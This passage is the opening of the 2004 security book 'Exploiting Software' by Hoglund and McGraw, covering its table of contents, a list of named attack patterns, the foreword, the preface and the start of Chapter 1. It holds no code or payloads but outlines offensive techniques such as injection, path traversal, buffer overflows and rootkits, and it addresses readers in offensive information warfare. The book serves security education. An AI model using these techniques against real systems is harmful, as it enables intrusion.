Exploiting Software: How to Break Code (ISBN 9780201786958, 0-201-78695-8)


English, 597 pages, 2004




Exploiting Software: How to Break Code
By Greg Hoglund, Gary McGraw

Publisher: Addison Wesley
Pub Date: February 17, 2004
ISBN: 0-201-78695-8
Pages: 512

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you. Getting beyond the script kiddie treatment found in many hacking books, you will learn about

• Why software exploit will continue to be a serious problem
• When network security mechanisms do not work
• Attack patterns
• Reverse engineering
• Classic attacks against server software
• Surprising attacks against client software
• Techniques for crafting malicious input
• The technical details of buffer overflows
• Rootkits

Exploiting Software is filled with the tools, concepts, and knowledge necessary to break software.




Table of Contents

Copyright
Praise for Exploiting Software
Attack Patterns
Foreword
Preface
  What This Book Is About
  How to Use This Book
  But Isn't This Too Dangerous?
Acknowledgments
  Greg's Acknowledgments
  Gary's Acknowledgments
Chapter 1. Software—The Root of the Problem
  A Brief History of Software
  Bad Software Is Ubiquitous
  The Trinity of Trouble
  The Future of Software
  What Is Software Security?
  Conclusion
Chapter 2. Attack Patterns
  A Taxonomy
  An Open-Systems View
  Tour of an Exploit
  Attack Patterns: Blueprints for Disaster
  An Example Exploit: Microsoft's Broken C++ Compiler
  Applying Attack Patterns
  Attack Pattern Boxes
  Conclusion
Chapter 3. Reverse Engineering and Program Understanding
  Into the House of Logic
  Should Reverse Engineering Be Illegal?
  Reverse Engineering Tools and Concepts
  Approaches to Reverse Engineering
  Methods of the Reverser
  Writing Interactive Disassembler (IDA) Plugins
  Decompiling and Disassembling Software
  Decompilation in Practice: Reversing helpctr.exe
  Automatic, Bulk Auditing for Vulnerabilities
  Writing Your Own Cracking Tools
  Building a Basic Code Coverage Tool
  Conclusion
Chapter 4. Exploiting Server Software
  The Trusted Input Problem
  The Privilege Escalation Problem
  Finding Injection Points
  Input Path Tracing
  Exploiting Trust through Configuration
  Specific Techniques and Attacks for Server Software
  Conclusion
Chapter 5. Exploiting Client Software
  Client-side Programs as Attack Targets
  In-band Signals
  Cross-site Scripting (XSS)
  Client Scripts and Malicious Code
  Content-Based Attacks
  Backwash Attacks: Leveraging Client-side Buffer Overflows
  Conclusion
Chapter 6. Crafting (Malicious) Input
  The Defender's Dilemma
  Intrusion Detection (Not)
  Partition Analysis
  Tracing Code
  Reversing Parser Code
  Example: Reversing I-Planet Server 6.0 through the Front Door
  Misclassification
  Building "Equivalent" Requests
  Audit Poisoning
  Conclusion
Chapter 7. Buffer Overflow
  Buffer Overflow 101
  Injection Vectors: Input Rides Again
  Buffer Overflows and Embedded Systems
  Database Buffer Overflows
  Buffer Overflows and Java?!
  Content-Based Buffer Overflow
  Audit Truncation and Filters with Buffer Overflow
  Causing Overflow with Environment Variables
  The Multiple Operation Problem
  Finding Potential Buffer Overflows
  Stack Overflow
  Arithmetic Errors in Memory Management
  Format String Vulnerabilities
  Heap Overflows
  Buffer Overflows and C++
  Payloads
  Payloads on RISC Architectures
  Multiplatform Payloads
  Prolog/Epilog Code to Protect Functions
  Conclusion
Chapter 8. Rootkits
  Subversive Programs
  A Simple Windows XP Kernel Rootkit
  Call Hooking
  Trojan Executable Redirection
  Hiding Files and Directories
  Patching Binary Code
  The Hardware Virus
  Low-Level Disk Access
  Adding Network Support to a Driver
  Interrupts
  Key Logging
  Advanced Rootkit Topics
  Conclusion
References
Index

Copyright

Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in this book, and Addison-Wesley was aware of a trademark claim, the designations have been printed in initial capital letters or in all capitals.

The authors and publisher have taken care in the preparation of this book, but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for incidental or consequential damages in connection with or arising out of the use of the information or programs contained herein.

The publisher offers discounts on this book when ordered in quantity for bulk purchases and special sales. For more information, please contact:

U.S. Corporate and Government Sales
(800) 382-3419
corpsales@pearsontechgroup.com

For sales outside of the U.S., please contact:

International Sales
(317) 581-3793
international@pearsontechgroup.com

Visit Addison-Wesley on the Web: www.awprofessional.com

Library of Congress Cataloging-in-Publication Data

Hoglund, Greg.
Exploiting software : how to break code / Greg Hoglund, Gary McGraw.
p. cm.
ISBN 0-201-78695-8 (pbk. : alk. paper)
1. Computer security. 2. Computer software—Testing. 3. Computer hackers. I. McGraw, Gary, 1966– II. Title.
QA76.9.A25H635 2004
005.8—dc22
2003025556

Copyright © 2004 by Pearson Education, Inc.

All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, electronic, mechanical, photocopying, recording or otherwise, without the prior consent of the publisher. Printed in the United States of America. Published simultaneously in Canada.

Dr. McGraw's work is partially supported by DARPA contract no. F30602-99-C-0172 (An Investigation of Extensible System Security for Highly Resource-Constrained Wireless Devices) and AFRL Wright-Patterson grant no. F33615-02-C-1295 (Protection Against Reverse Engineering: State of the Art in Disassembly and Decompilation). The views and conclusions contained in this book are those of the authors and should not be interpreted as representing the official policies, either expressed or implied, of DARPA, the US Air Force, or the US government.

For information on obtaining permission for use of material from this work, please submit a written request to:

Pearson Education, Inc.
Rights and Contracts Department
75 Arlington Street, Suite 300
Boston, MA 02116
Fax: (617) 848-7047

Text printed on recycled paper

1 2 3 4 5 6 7 8 9 10—CRS—0807060504

First printing, February 2004

Dedication

In memory of Nancy Simone McGraw (1939–2003).
Bye, Mom.

Praise for Exploiting Software

"Exploiting Software highlights the most critical part of the software quality problem. As it turns out, software quality problems are a major contributing factor to computer security problems. Increasingly, companies large and small depend on software to run their businesses every day. The current approach to software quality and security taken by software companies, system integrators, and internal development organizations is like driving a car on a rainy day with worn-out tires and no airbags. In both cases, the odds are that something bad is going to happen, and there is no protection for the occupant/owner. This book will help the reader understand how to make software quality part of the design—a key change from where we are today!"
—Tony Scott, Chief Technology Officer, IS&S, General Motors Corporation

"It's about time someone wrote a book to teach the good guys what the bad guys already know. As the computer security industry matures, books like Exploiting Software have a critical role to play."
—Bruce Schneier, Chief Technology Officer, Counterpane; Author of Beyond Fear and Secrets and Lies

"Exploiting Software cuts to the heart of the computer security problem, showing why broken software presents a clear and present danger. Getting past the 'worm of the day' phenomenon requires that someone other than the bad guys understands how software is attacked. This book is a wake-up call for computer security."
—Elinor Mills Abreu, Reuters' correspondent

"Police investigators study how criminals think and act. Military strategists learn about the enemy's tactics, as well as their weapons and personnel capabilities. Similarly, information security professionals need to study their criminals and enemies, so we can tell the difference between popguns and weapons of mass destruction. This book is a significant advance in helping the 'white hats' understand how the 'black hats' operate. Through extensive examples and 'attack patterns,' this book helps the reader understand how attackers analyze software and use the results of the analysis to attack systems. Hoglund and McGraw explain not only how hackers attack servers, but also how malicious server operators can attack clients (and how each can protect themselves from the other). An excellent book for practicing security engineers, and an ideal book for an undergraduate class in software security."
—Jeremy Epstein, Director, Product Security & Performance, webMethods, Inc.

"A provocative and revealing book from two leading security experts and world class software exploiters, Exploiting Software enters the mind of the cleverest and wickedest crackers and shows you how they think. It illustrates general principles for breaking software, and provides you a whirlwind tour of techniques for finding and exploiting software vulnerabilities, along with detailed examples from real software exploits. Exploiting Software is essential reading for anyone responsible for placing software in a hostile environment—that is, everyone who writes or installs programs that run on the Internet."
—Dave Evans, Ph.D., Associate Professor of Computer Science, University of Virginia

"The root cause for most of today's Internet hacker exploits and malicious software outbreaks are buggy software and faulty security software deployment. In Exploiting Software, Greg Hoglund and Gary McGraw help us in an interesting and provocative way to better defend ourselves against malicious hacker attacks on those software loopholes. The information in this book is an essential reference that needs to be understood, digested, and aggressively addressed by IT and information security professionals everywhere."
—Ken Cutler, CISSP, CISA, Vice President, Curriculum Development & Professional Services, MIS Training Institute

"This book describes the threats to software in concrete, understandable, and frightening detail. It also discusses how to find these problems before the bad folks do. A valuable addition to every programmer's and security person's library!"
—Matt Bishop, Ph.D., Professor of Computer Science, University of California at Davis, Author of Computer Security: Art and Science

"Whether we slept through software engineering classes or paid attention, those of us who build things remain responsible for achieving meaningful and measurable vulnerability reductions. If you can't afford to stop all software manufacturing to teach your engineers how to build secure software from the ground up, you should at least increase awareness in your organization by demanding that they read Exploiting Software. This book clearly demonstrates what happens to broken software in the wild."
—Ron Moritz, CISSP, Senior Vice President, Chief Security Strategist, Computer Associates

"Exploiting Software is the most up-to-date technical treatment of software security I have seen. If you worry about software and application vulnerability, Exploiting Software is a must-read. This book gets at all the timely and important issues surrounding software security in a technical, but still highly readable and engaging, way. Hoglund and McGraw have done an excellent job of picking out the major ideas in software exploit and nicely organizing them to make sense of the software security jungle."
—George Cybenko, Ph.D., Dorothy and Walter Gramm Professor of Engineering, Dartmouth; Founding Editor-in-Chief, IEEE Security and Privacy

"This is a seductive book. It starts with a simple story, telling about hacks and cracks. It draws you in with anecdotes, but builds from there. In a few chapters you find yourself deep in the intimate details of software security. It is the rare technical book that is a readable and enjoyable primer but has the substance to remain on your shelf as a reference. Wonderful stuff."
—Craig Miller, Ph.D., Chief Technology Officer for North America, Dimension Data

"It's hard to protect yourself if you don't know what you're up against. This book has the details you need to know about how attackers find software holes and exploit them—details that will help you secure your own systems."
—Ed Felten, Ph.D., Professor of Computer Science, Princeton University

Attack Patterns

Attack Pattern: Make the Client Invisible 150
Attack Pattern: Target Programs That Write to Privileged OS Resources 152
Attack Pattern: Use a User-Supplied Configuration File to Run Commands That Elevate Privilege 153
Attack Pattern: Make Use of Configuration File Search Paths 156
Attack Pattern: Direct Access to Executable Files 162
Attack Pattern: Embedding Scripts within Scripts 164
Attack Pattern: Leverage Executable Code in Nonexecutable Files 165
Attack Pattern: Argument Injection 169
Attack Pattern: Command Delimiters 172
Attack Pattern: Multiple Parsers and Double Escapes 173
Attack Pattern: User-Supplied Variable Passed to File System Calls 185
Attack Pattern: Postfix NULL Terminator 186
Attack Pattern: Postfix, Null Terminate, and Backslash 186
Attack Pattern: Relative Path Traversal 187
Attack Pattern: Client-Controlled Environment Variables 189
Attack Pattern: User-Supplied Global Variables (DEBUG=1, PHP Globals, and So Forth) 190
Attack Pattern: Session ID, Resource ID, and Blind Trust 192
Attack Pattern: Analog In-Band Switching Signals (aka "Blue Boxing") 205
Attack Pattern Fragment: Manipulating Terminal Devices 210
Attack Pattern: Simple Script Injection 214
Attack Pattern: Embedding Scripts in Nonscript Elements 215
Attack Pattern: XSS in HTTP Headers 216
Attack Pattern: HTTP Query Strings 216
Attack Pattern: User-Controlled Filename 217
Attack Pattern: Passing Local Filenames to Functions That Expect a URL 225
Attack Pattern: Meta-characters in E-mail Header 226
Attack Pattern: File System Function Injection, Content Based 229
Attack Pattern: Client-side Injection, Buffer Overflow 231
Attack Pattern: Cause Web Server Misclassification 263
Attack Pattern: Alternate Encoding the Leading Ghost Characters 267
Attack Pattern: Using Slashes in Alternate Encoding 268
Attack Pattern: Using Escaped Slashes in Alternate Encoding 270
Attack Pattern: Unicode Encoding 271
Attack Pattern: UTF-8 Encoding 273
Attack Pattern: URL Encoding 273
Attack Pattern: Alternative IP Addresses 274
Attack Pattern: Slashes and URL Encoding Combined 274
Attack Pattern: Web Logs 275
Attack Pattern: Overflow Binary Resource File 293
Attack Pattern: Overflow Variables and Tags 294
Attack Pattern: Overflow Symbolic Links 294
Attack Pattern: MIME Conversion 295
Attack Pattern: HTTP Cookies 295
Attack Pattern: Filter Failure through Buffer Overflow 296
Attack Pattern: Buffer Overflow with Environment Variables 297
Attack Pattern: Buffer Overflow in an API Call 297
Attack Pattern: Buffer Overflow in Local Command-Line Utilities 297
Attack Pattern: Parameter Expansion 298
Attack Pattern: String Format Overflow in syslog() 324

Foreword

In early July 2003 I received a call from David Dill, a computer science professor at Stanford University. Dill informed me that the source code to an electronic voting machine produced by Diebold Election Systems, one of the top vendors, had leaked onto the Internet, and that perhaps it would be worth examining it for security vulnerabilities. This was a rare opportunity, because voting system manufacturers have been very tight with their proprietary code. What we found was startling: Security and coding flaws were so prevalent that an attack might be delayed because the attacker might get stuck trying to choose from all the different vulnerabilities to exploit without knowing where to turn first. (Such delay tactics are not recommended as a security strategy.) There were large, complex chunks of code with no comments. There was a single static key hardwired into the code for encrypting vote tallies. Insecure pseudorandom number generators and noncryptographic checksums were used. And inspection of the CVS logs revealed an arbitrary, seemingly ad hoc source code management process. And then there were the serious flaws.

Was the Diebold voting machine example an isolated incident of poor quality control? I don't think so. Many companies such as Diebold are hard pressed to get their products to market before their competitors. The company with the best, functionally correct system wins. This incentive model rewards the company with the product that is available first and has the most features, not the one with the most secure software. Getting security right is very difficult, and the result is not always tangible. Diebold was unlucky: Their code was examined in a public forum and was shown to be completely broken. Most companies are relatively safe in the assumption that independent analysis will only get to see their code under strict nondisclosure agreements. Only when they are held to the fire do companies pay the kind of attention to security that is warranted.

Diebold's voting machine code was not the first highly complex system that I had ever looked at that was full of security flaws. Why is it so difficult to produce secure software? The answer is simple. Complexity. Anyone who has ever programmed knows that there are unlimited numbers of choices when writing code. An important choice is which programming language to use. Do you want something that allows the flexibility of pointer arithmetic with the opportunities it allows for manual performance optimization, or do you want a type-safe language that avoids buffer overflows but removes some of your power? For every task, there are seemingly infinite choices of algorithms, parameters, and data structures to use. For every block of code, there are choices on how to name variables, how to comment, and even how to lay out the code in relation to the white space around it. Every programmer is different, and every programmer is likely to make different choices. Large software projects are written in teams, and different programmers have to be able to understand and modify the code written by others. It is hard enough to manage one's own code, let alone software produced by someone else. Avoiding serious security vulnerabilities in the resulting code is challenging for programs with hundreds of lines of code. For programs with millions of lines of code, such as modern operating systems, it is impossible.

However, large systems must be built, so we cannot just give up and say that writing such systems securely is impossible. McGraw and Hoglund have done a marvelous job of explaining why software is exploitable, of demonstrating how exploits work, and of educating the reader on how to avoid writing exploitable code. You may wonder whether it is a good idea to demonstrate how exploits work, as this book does. In fact, there is a trade off that security professionals must consider, between publicizing exploits and keeping them quiet. This book takes the correct position that the only way to program in such a way that minimizes the vulnerabilities in software is to understand why vulnerabilities exist and how attackers exploit them. To this end, this book is a must-read for anybody building any networked application or operating system.

Exploiting Software is the best treatment of any kind that I have seen on the topic of software vulnerabilities. Gary McGraw and Greg Hoglund have a long history of treating this subject. McGraw's first book, Java Security, was a groundbreaking look at the security problems in the Java runtime environment and the security issues surrounding the novel concept of untrusted mobile code running inside a trusted browser. McGraw's later book, Building Secure Software, was a classic, demonstrating concepts that could be used to avoid many of the vulnerabilities described in the current book. Hoglund has vast experience developing rootkits and implementing exploit defenses in practice.

After reading this book, you may find it surprising not that so many deployed systems can be hacked, but that so many systems have not yet been hacked. The analysis we did of an electronic voting machine demonstrated that software vulnerabilities are all around us. The fact that many systems have not yet been exploited only means that attackers are satisfied with lower hanging fruit right now. This will be of little comfort to me the next time I go to the polls and am faced with a Windows-based electronic voting machine. Maybe I'll just mail in an absentee ballot, at least that voting technology's insecurities are not based on software flaws.

Aviel D. Rubin
Associate Professor, Computer Science
Technical Director, Information Security Institute
Johns Hopkins University


Preface

Software security is gaining momentum as security professionals realize that computer security is really all about making software behave. The publication of Building Secure Software in 2001 (Viega and McGraw) unleashed a number of related books that have crystallized software security as a critical field. Already, security professionals, software developers, and business leaders are resonating with the message and asking for more.

Building Secure Software (co-authored by McGraw) is intended for software professionals ranging from developers to managers, and is aimed at helping people develop more secure code. Exploiting Software is useful to the same target audience, but is really intended for security professionals interested in how to find new flaws in software. This book should be of particular interest to security practitioners working to beef up their software security skills, including red teams and ethical hackers.

Exploiting Software is about how to break code. Our intention is to provide a realistic view of the technical issues faced by security professionals. This book is aimed directly toward software security as opposed to network security. As security professionals come to grips with the software security problem, they need to understand how software systems break.

Solutions to each of the problems discussed in Exploiting Software can be found in Building Secure Software. The two books are mirror images of each other.

We believe that software security and application security practitioners are in for a reality check. The problem is that simple, popular approaches being hawked by upstart "application security" vendors as solutions—such as canned black box testing tools—barely scratch the surface. This book aims to cut directly through the hype to the heart of the matter. We need to get real about what we're up against. This book describes exactly that.

What This Book Is About

This book closely examines many real-world software exploits, explaining how and why they work, the attack patterns they are based on, and in some cases how they were discovered. Along the way, this book also shows how to uncover new software vulnerabilities and how to use them to break machines.

Chapter 1 describes why software is the root of the computer security problem. We introduce the trinity of trouble—complexity, extensibility, and connectivity—and describe why the software security problem is growing. We also describe the future of software and its implications for software exploit.

Chapter 2 describes the difference between implementation bugs and architectural flaws. We discuss the problem of securing an open system, and explain why risk management is the only sane approach. Two real-world exploits are introduced: one very simple and one technically complex. At the heart of Chapter 2 is a description of attack patterns. We show how attack patterns fit into the classic network security paradigm and describe the role that attack patterns play in the rest of the book.

The subject of Chapter 3 is reverse engineering. Attackers disassemble, decompile, and deconstruct programs to understand how they work and how they can be made not to. Chapter 3 describes common gray box analysis techniques, including the idea of using a security patch as an attack map. We discuss Interactive Disassembler (IDA), the state-of-the-art tool used by hackers to understand programs. We also discuss in detail how real cracking tools are built and used.

In Chapters 4, 5, 6, and 7, we discuss particular attack examples that provide instances of attack patterns. These examples are marked with an asterisk.

Chapters 4 and 5 cover the two ends of the client–server model. Chapter 4 begins where the book Hacking Exposed [McClure et al., 1999] leaves off, discussing trusted input, privilege escalation, injection, path tracing, exploiting trust, and other attack techniques specific to server software. Chapter 5 is about attacking client software using in-band signals, cross-site scripting, and mobile code. The problem of backwash attacks is also introduced. Both chapters are studded with attack patterns and examples of real attacks.

Chapter 6 is about crafting malicious input. It goes far beyond standard-issue "fuzzing" to discuss partition analysis, tracing code, and reversing parser code. Special attention is paid to crafting equivalent requests using alternate encoding techniques. Once again, both real-world example exploits and the attack patterns that inspire them are highlighted throughout.

The whipping boy of software security, the dreaded buffer overflow, is the subject of Chapter 7. This chapter is a highly technical treatment of buffer overflow attacks that leverages the fact that other texts supply the basics. We discuss buffer overflows in embedded systems, database buffer overflows, buffer overflow as targeted against Java, and content-based buffer overflows. Chapter 7 also describes how to find potential buffer overflows of all kinds, including stack overflows, arithmetic errors, format string vulnerabilities, heap overflows, C++ vtables, and multistage trampolines. Payload architecture is covered in detail for a number of platforms, including x86, MIPS, SPARC, and PA-RISC. Advanced techniques such as active armor and the use of trampolines to defeat weak security mechanisms are also covered. Chapter 7 includes a large number of attack patterns.

Chapter 8 is about rootkits—the ultimate apex of software exploit. This is what it means for a machine to be "owned." Chapter 8 centers around code for a real Windows XP rootkit. We cover call hooking, executable redirection, hiding files and processes, network support, and patching binary code. Hardware issues are also discussed in detail, including techniques used in the wild to hide rootkits in EEPROM. A number of advanced rootkit topics top off Chapter 8.

As you can see, Exploiting Software runs the gamut of software risk, from malicious input to stealthy rootkits. Using attack patterns, real code, and example exploits, we clearly demonstrate the techniques that are used every day by real malicious hackers against software.

How to Use This Book

This book is useful to many different kinds of people: network administrators, security consultants, information warriors, developers, and security programmers.

• If you are responsible for a network full of running software, you should read this book to learn the kinds of weaknesses that exist in your system and how they are likely to manifest.

• If you are a security consultant, you should read this book so you can effectively locate, understand, and measure security holes in customer systems.

• If you are involved in offensive information warfare, you should use this book to learn how to penetrate enemy systems through software.

• If you create software for a living, you should read this book to understand how attackers will approach your creation. Today, all developers should be security minded. The knowledge here will arm you with a real understanding of the software security problem.

• If you are a security programmer who knows your way around code, you will love this book.

The primary audience for this book is the security programmer, but there are important lessons here for all computer professionals.

But Isn't This Too Dangerous?

It's important to emphasize that none of the information we discuss here is news to the hacker community. Some of these techniques are as old as the hills. Our real objective is to provide some eye-opening information and up the level of discourse in software security.

Some security experts may worry that revealing the techniques described in this book will encourage more people to try them out. Perhaps this is true, but hackers have always had better lines of communication and information sharing than the good guys. This information needs to be understood and digested by security professionals so that they know the magnitude of the problem and they can begin to address it properly. Shall we grab the bull by the horns or put our head in the sand?

Perhaps this book will shock you. No matter what, it will educate you.

Acknowledgments

This book took a long time to write. Many people helped, both directly and indirectly. We retain the blame for any errors and omissions herein, but we want to share the credit with those who have directly influenced our work.

The following people provided helpful reviews to early drafts of this book: Alex Antonov, Richard Bejtlich, Nishchal Bhalla, Anton Chuvakin, Greg Cummings, Marcus Leech, CC Michael, Marcus Ranum, John Steven, Walt Stoneburner, Herbert Thompson, Kartik Trivedi, Adam Young, and a number of anonymous reviewers.

Finally, we owe our gratitude to the fine people at Addison-Wesley, especially our editor, Karen Gettman, and her two assistants, Emily Frey and Elizabeth Zdunich. Thanks for putting up with the seemingly endless process as we wandered our way to completion.

Greg's Acknowledgments

First and foremost I acknowledge my business partner and now wife, Penny. This work would not have been possible without her support. Big thanks to my daughter Kelsey too! Along the way, many people have offered their time and technical know-how. A big thanks to Matt Hargett for coming up with a killer idea and having the historical perspective needed for success. Also, thanks to Shawn Bracken and Jon Gary for sitting it out in my garage and using an old door for a desk. Thanks to Halvar Flake for striking my interest in IDA plugins and being a healthy abrasion. Thanks to David Aitel and other members of 0dd for providing technical feedback on shell code techniques. Thanks to Jamie Butler for excellent rootkit skills, and to Jeff and Ping Moss, and the whole Black Hat family.

Gary McGraw has been instrumental in getting this book published—both by being a task master and by having the credibility that this subject needs. Much of my knowledge is self-taught and Gary adds an underlying academic structure to the work. Gary is a very direct, "no BS" kind of person. This, backed up with his deep knowledge of the subject matter, welds naturally with my technical material. Gary is also a good friend.

Gary's Acknowledgments

Once again, my first acknowledgment goes to Cigital (http://www.cigital.com), which continues to be an excellent place to work. The creative environment and top-notch people make going to work every day a pleasure (even with the economy in the doldrums). Special thanks to the executive team for putting up with my perpetual habit of book writing: Jeff Payne, Jeff Voas, Charlie Crew, and Karl Lewis. The Office of the CTO at Cigital, staffed by the hugely talented John Steven and Rich Mills, keeps my skills as sharp as any pointy-haired guy. The self-starting engineering team including the likes of Frank Charron, Todd McAnally, and Mike Debnam builds great stuff and puts ideas into concrete practice. Cigital's Software Security Group (SSG), which I founded in 1999, is now ably led by Stan Wisseman. The SSG continues to expand the limits of world-class software security. Special shouts to SSG members Bruce Potter and Paco Hope. Thanks to Pat Higgins and Mike Firetti for keeping me busy tap dancing. Also thanks to Cigital's esteemed Technical Advisory Board. Finally, a special thanks to Yvonne Wiley, who keeps track of my location on the planet quite adeptly.

Without my co-author, Greg Hoglund, this book would never have happened. Greg's intense skills can be seen throughout this work. If you dig the technical meat in this book, thank Greg.

Like my previous three books, this book is really a collaborative effort. My friends in the security community that continue to influence my thinking include Ross Anderson, Annie Anton, Matt Bishop, Steve Bellovin, Bill Cheswick, Crispin Cowan, Drew Dean, Jeremy Epstein, Dave Evans, Ed Felten, Anup Ghosh, Li Gong, Peter Honeyman, Mike Howard, Steve Kent, Paul Kocher, Carl Landwehr, Patrick McDaniel, Greg Morrisett, Peter Neumann, Jon Pincus, Marcus Ranum, Avi Rubin, Fred Schneider, Bruce Schneier, Gene Spafford, Kevin Sullivan, Phil Venables, and Dan Wallach. Thanks to the Defense Advanced Research Projects Agency (DARPA) and the Air Force Research Laboratory (AFRL) for supporting my work over the years.

Most important of all, thanks to my family. Love to Amy Barley, Jack, and Eli. Special love to my dad (beach moe) and my brothers—2003 was a difficult year for us. Hollers and treats to the menagerie: ike and walnut, soupy and her kitties, craig, sage and guthrie, lewy and lucy, daddy-o the rooster. Thanks to rhine and april for the music, bob and jenn for the "girls," and cyn and ant for living over the hill.

Chapter 1. Software—The Root of the Problem

So you want to break software, leave it begging for mercy in RAM after it has relinquished all of its secrets and conjured up a shell for you. Hacking the machine is almost always about exploiting software. And more often than not, the machine is not even a standard computer.[1] Almost all modern systems share a common Achilles' heel in the form of software. This book shows you how software breaks and teaches you how to exploit software weakness in order to control the machine.

[1] Of course, most exploits are designed to break off-the-shelf software running on off-the-shelf computers used by everyday business people.

There are plenty of good books on network security out there. Bruce Schneier's Secrets and Lies [2000] provides a compelling nickel tour of the facilities, filled to the brim with excellent examples and wise insight. Hacking Exposed, by McClure et al. [1999], is a decent place to start if you're interested in understanding (and carrying out) generic attacks. Defending against such attacks is important, but is only one step in the right direction. Getting past the level of script kiddie tools is essential to better defense (and offense). The White Hat Security Arsenal [Rubin 1999] can help you defend a network against any number of security problems. Ross Anderson's Security Engineering [2001] takes a detailed systematic look at the problem. So why another book on security?

As Schneier says in the Preface to Building Secure Software [Viega and McGraw, 2001], "We wouldn't have to spend so much time, money, and effort on network security if we didn't have such bad software security." He goes on to say the following:

Think about the most recent security vulnerability you've read about. Maybe it's a killer packet, which allows an attacker to crash some server by sending it a particular packet. Maybe it's one of the gazillions of buffer overflows, which allow an attacker to take control of a computer by sending it a particular malformed message. Maybe it's an encryption vulnerability, which allows an attacker to read an encrypted message, or fool an authentication system. These are all software issues. (p. xix)

Of the reams of security material published to date, very little has focused on the root of the problem—software failure. We explore the untamed wilderness of software failure and teach you to navigate its uncharted depths.

A Brief History of Software

Modern computers are no longer clunky, room-size devices that require an operator to walk into them to service them. Today, users are more likely to wear computers than to enter them. Of all the technology drivers that have brought about this massive change, including the vacuum tube, the transistor, and the silicon chip, the most important by far is software.

Software is what sets computers apart from other technological innovations. The very idea of reconfiguring a machine to do a seemingly infinite number of tasks is powerful and compelling. The concept has a longer history as an idea than it has as a tangible enterprise. In working through his conception of the Analytical Engine in 1842, Charles Babbage enlisted the help of Lady Ada Lovelace as a translator. Ada, who called herself "an Analyst (and Metaphysician)," understood the plans for the device as well as Babbage, but was better at articulating its promise, especially in the notes that she appended to the original work. She understood that the Analytical Engine was what we would call a general-purpose computer, and that it was suited for "developping [sic] and tabulating any function whatever. . . . the engine [is] the material expression of any indefinite function of any degree of generality and complexity."[2] What she had captured in those early words is the power of software.

[2] For more information on Lady Ada Lovelace, see http://www.sdsc.edu/ScienceWomen/lovelace.html.

According to Webster's Collegiate dictionary, the word software came into common use in 1960:

Main entry: soft·ware
Pronunciation: 'soft-"war, -"wer
Function: noun
Date: 1960
: something used or associated with and usually contrasted with hardware: as the entire set of programs, procedures, and related documentation associated with a system and especially a computer system; specifically: computer programs. . ."

In the 1960s, the addition of "modern, high-level" languages like Fortran, Pascal, and C allowed software to begin to carry out more and more important operations. Computers began to be defined more clearly by what software they ran than by what hardware the programs operated on. Operating systems sprouted and evolved. Early networks were formed and grew. A great part of this evolution and growth happened in software.[3] Software became essential.

[3] There is a great synergy between hardware and software advances. The fact that hardware today is incredibly capable (especially relative to hardware predecessors) certainly does its share to advance the state of the practice in software.

A funny thing happened on the way to the Internet. Software, once thought of solely as a beneficial enabler, turned out to be agnostic when it came to morals and ethics. As it turns out, Lady Lovelace's claim that software can provide "any function whatsoever" is true, and "any function" includes malicious functions, potentially dangerous functions, and just plain wrong functions. As software became more powerful, it began moving out of strictly technical realms (the domain of the geeks) and into many other areas of life. Business and military use of software became increasingly common. It remains very common today. The business world has plenty to lose if software fails. Business software operates supply chains, provides instant access to global information, controls manufacturing plants, and manages customer relationships. This means that software failure leads to serious problems. In fact, software that fails or misbehaves can now

Expose confidential data to unauthorized users (including attackers)

Crash or otherwise grind to a halt when exposed to faulty inputs

Allow an attacker to inject code and execute it

Execute privileged commands on behalf of a clever attacker

Networks have had a very large (mostly negative) impact on the idea of making software behave. Since its birth in the early 1970s as a 12-node network called the ARPANET, the Internet has been adopted at an unprecedented rate, moving into our lives much more speedily than a number of other popular technologies, including electricity and the telephone (Figure 1-1). If the Internet is a car, software is its engine.

Figure 1-1. Rate of adoption of various technologies in years. The graph shows years (since introduction/invention noted as year 0) on the x-axis and market penetration (by percentage of households) on the y-axis. The slopes of the different curves are telling, to say the least. Clearly, the Internet is being adopted more quickly (and thus with a more profound cultural impact) than any other human technology in history. (Information from Dan Geer, personal communication.)

Connecting computers in a network allows computer users to share data, programs, and each others' computational resources. Once a computer is put on a network, it can be accessed remotely, allowing geographically distant users to retrieve data or to use its CPU cycles and other resources. The software technology that allows this to happen is very new and largely unstable. In today's fast-paced economy, there is strong market pressure on software companies to deliver new and compelling technology. "Time to market" is a critical driver, and "get it done yesterday" is a common mandate. The longer it takes to get a technology to market, the more risk there is of business failure. Because doing things carefully takes too much time and money, software tends to be written in haste and is poorly tested. This slipshod approach to software development has resulted in a global network with billions of exploitable bugs.

Most network-based software includes security features. One simple security feature is the password. Although the movie cliché of an easily guessed password is common, passwords do sometimes slow down a potential attacker. But this only goes for naive attackers who attempt the front door. The problem is that many security mechanisms meant to protect software are themselves software, and are thus themselves subject to more sophisticated attack. Because a majority of security features are part of the software, they usually can be bypassed. So even though everyone has seen a movie in which the attacker guesses a password, in real life an attacker is generally concerned with more complex security features of the target. More complex features and related attacks include

Controlling who is allowed to connect to a particular machine

Detecting whether access credentials are being faked

Determining who can access which resources on a shared machine

Protecting data (especially in transit) using encryption

Determining how and where to collect and store audit trails

Tens of thousands of security-relevant computer software bugs were discovered and reported publicly throughout the 1990s. These kinds of problems led to widespread exploits of corporate networks. Today, tens of thousands of backdoors are said to be installed in networks across the globe—fallout from the massive boom in hacking during the late 20th century. As things currently stand, cleaning up the mess we are in is darn near impossible, but we have to try. The first step in working through this problem is understanding what the problem is. One reason this book exists is to spark discourse on the true technical nature of software exploit, getting past the shiny surface to the heart of the problem.

Software and the Information Warrior

The second oldest profession is war. But even a profession as ancient as war has its modern cyber instantiation. Information warfare (IW) is essential to every nation and corporation that intends to thrive (and survive) in the modern world. Even if a nation is not building IW capability, it can be assured that its enemies are, and that the nation will be at a distinct disadvantage in future wars.

Intelligence gathering is crucial to war. Because IW is clearly all about information, it is also deeply intertwined with intelligence gathering.[4] Classic espionage has four major purposes:

[4] See the book by Dorothy Denning, Information Warfare & Security [1998], for more information on this issue.

1. National defense (and national security)
2. Assistance in a military operation
3. Expansion of political influence and market share
4. Increase in economic power

